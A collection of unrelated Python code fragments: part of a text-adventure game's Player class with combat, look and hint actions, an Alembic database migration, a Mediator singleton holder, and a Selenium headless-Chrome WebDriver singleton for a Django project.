# type(self) may be Player or a derived class from player
type(self).drop.undecorated(self, item)
return ACTION.SUCC_DROP
@action_method
def attack(self, monstername):
"""
kill a monster based on randomness, the monster's strength and on how
long the fight has been going already. Die if killing fails too often.
If the history of the monster is -1, the monster's ``ignoretext`` gets returned.
"""
if not monstername:
return FIGHTING.WHAT
monsters = [m for m in self.location.monsters.values() if m.name==monstername]
# should be max 1
if len(monsters) == 0:
# maybe there's a dead one?
if monstername in [m.name for m in self.location.items.values()]:
return FIGHTING.ALREADY_DEAD.format(monstername)
return FIGHTING.NO_MONSTER.format(monstername)
elif len(monsters) == 1:
monster = monsters[0]
if monster.status["singleencounter"]:
return FIGHTING.ALREADY_GONE.format(monstername)
monster.status["fighting"] = True
if monster.history == -1:
return monster.ignoretext
elif monster.history < 2:
if self.random.random() > monster.strength-monster.history/10:
monster.kill()
return FIGHTING.ATTACK
elif monster.history == 2:
if self.random.random() > monster.strength-0.2:
monster.kill()
return FIGHTING.LAST_ATTACK
self.status["alive"] = False
return FIGHTING.DEATH
else:
logger.error("There's currently more than one monster with "
"name {} in room {}. This should not be possible!".format(monstername, self.location.id))
@action_method
def show_score(self):
return INFO.SCORE.format(self.score)
def forget(self):
"""
set old location to current location
"""
self.oldlocation = self.location
@action_method
def look(self):
"""
get the long description of the current location.
        Also spawn monsters and run check_restrictions (see :func:`textgame.room.Room.check_restrictions`)
"""
# spawn monsters before describing the room
self.world.spawn_monster(self.location)
        # check if the room is dark etc., plus any special cases
msg = self.location.check_restrictions(self)
msg += self.location.describe(long=True)
return msg
@action_method
def listen(self):
"""
get the current room's sound
"""
return self.location.sound
def has_light(self):
"""
returns true if player carries anything that lights a room up
"""
return any([lamp in self.inventory for lamp in LIGHT])
@player_method
def ask_hint(self):
"""
ask for a hint in the current location,
if there is one, return :class:`textgame.parser.EnterYesNoLoop` if the hint
should really be displayed
"""
warning, hint = self.location.get_hint()
if not hint:
return INFO.NO_HINT
def hint_conversation():
warning, hint = self.location.get_hint()
self.score -= self.location.hint_value
return hint
# stuff hint_conversation inside the EnterYesNoLoop,
# this will be called during conversation
return EnterYesNoLoop(
question = warning,
yes = hint_conversation,
no = "ok."
)
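# Construction sketch (illustrative; ``world`` must be a textgame.world.World and
# ``start_room`` one of its rooms, "lamp" is a made-up item id):
#
#     player = Player(world, start_room)
#     print(player.go("north"))     # returns the description of the new room
#     print(player.take("lamp"))    # moves the item into player.inventory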
|
"""added directionality
Revision ID: 2de7150f9351
Revises: 85b225ba7bce
Create Date: 2021-08-27 10:06:09.044287
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '2de7150f9351'
down_revision = '85b225ba7bce'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('dataset', sa.Column('directionality', sa.String(length=64), nullable=True))
op.alter_column('session', 'session_object',
existing_type=mysql.LONGTEXT(),
type_=sa.Text(length=1000000000),
existing_nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('session', 'session_object',
existing_type=sa.Text(length=1000000000),
type_=mysql.LONGTEXT(),
existing_nullable=True)
op.drop_column('dataset', 'directionality')
# ### end Alembic commands ###
|
#We want a single reference for the mediator to be used in all classes.
#For now just make it a static class variable
from mediator import Mediator
class MediatorResource:
Mediator = Mediator()
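# Usage sketch (illustrative; the importing module path is an assumption, and no
# claim is made about Mediator's own API): every importer shares one instance.
#
#     from mediator_resource import MediatorResource
#     shared = MediatorResource.Mediator   # always the same Mediator object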
|
from django.conf import settings
import logging
from selenium import webdriver
from retry import retry
logger = logging.getLogger(__name__)
class WebDriverSingleton(object):
_instance = None
@classmethod
def instance(cls):
if cls._instance is None:
cls._instance = WebDriverSingleton()
return cls._instance
@retry(delay=1, tries=5)
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('headless')
driver_path = settings.DRIVER_PATH
if settings.DEV_ENV:
chrome_driver = webdriver.Chrome(driver_path, chrome_options=options)
else:
options.binary_location = driver_path
chrome_driver = webdriver.Chrome(executable_path="chromedriver", chrome_options=options)
logger.info('Initialized web driver')
self.chrome_driver = chrome_driver
def shutdown(self):
self.chrome_driver.close()
logger.info('Shutting down web driver')
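# Usage sketch (illustrative; example.com is a placeholder URL): callers go through
# the class method so that only one Chrome driver is created per process.
#
#     driver = WebDriverSingleton.instance().chrome_driver
#     driver.get("https://example.com")
#     WebDriverSingleton.instance().shutdown()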
|